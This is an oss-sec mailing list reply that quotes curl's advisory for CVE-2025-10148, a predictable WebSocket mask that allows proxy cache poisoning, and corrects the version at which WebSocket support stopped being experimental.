oss-sec mailing list archives

Re: [SECURITY ADVISORY] curl: CVE-2025-10148: predictable WebSocket mask

From: Emilio Pozuelo Monfort <pochu27 () gmail com>
Date: Wed, 10 Sep 2025 14:18:50 +0200

Hi Daniel,

On 10/09/2025 07:54, Daniel Stenberg wrote:

predictable WebSocket mask
==========================

Project curl Security Advisory, September 10 2025 -
[Permalink](https://curl.se/docs/CVE-2025-10148.html)

VULNERABILITY
-------------

curl's websocket code did not update the 32 bit mask pattern for each new
outgoing frame as the specification says. Instead it used a fixed mask that
persisted and was used throughout the entire connection.

A predictable mask pattern allows for a malicious server to induce traffic
between the two communicating parties that could be interpreted by an involved
proxy (configured or transparent) as genuine, real, HTTP traffic with content
and thereby poison its cache. That cached poisoned content could then be
served to all users of that proxy.

INFO
----

This exact scenario is warned about in the security section of the WebSocket
RFC 6455 and is the very reason the mask should be updated for every outgoing
frame.

For this bug to become a real-life problem, the libcurl-using application must
be communicating through such a (defective) proxy that confuses a WebSocket
communication for HTTP traffic. Further, to trigger the problem it requires
the traffic to be done using clear text HTTP / WebSocket (`ws://`) and not
over TLS (`wss://`).

The Common Vulnerabilities and Exposures (CVE) project has assigned the name
CVE-2025-10148 to this issue.

CWE-340: Generation of Predictable Numbers or Identifiers

Severity: Low

AFFECTED VERSIONS
-----------------

- Affected versions: curl 7.86.0 to and including 8.15.0
- Not affected versions: curl < 7.86.0 and >= 8.16.0
- Introduced-in: https://github.com/curl/curl/commit/d78e129d50b2d1

WebSocket was considered experimental before 7.86.0 and therefore we do not
consider earlier versions vulnerable.

From what I can see, websocket support was introduced in 7.86 in [1], and latermarked as supported/not-experimental in 8.11 [2]. If so, I think the above note(also in [3]) should say that it was experimental before 8.11.


Cheers,
Emilio

[1] https://github.com/curl/curl/commit/664249d095275e
[2] https://github.com/curl/curl/commit/d78e129d50b2d1
[3] https://curl.se/docs/CVE-2025-10148.html

Current thread:

[SECURITY ADVISORY] curl: CVE-2025-10148: predictable WebSocket mask Daniel Stenberg (Sep 09)
- Re: [SECURITY ADVISORY] curl: CVE-2025-10148: predictable WebSocket mask Emilio Pozuelo Monfort (Sep 10)
  - Re: [SECURITY ADVISORY] curl: CVE-2025-10148: predictable WebSocket mask Daniel Stenberg (Sep 10)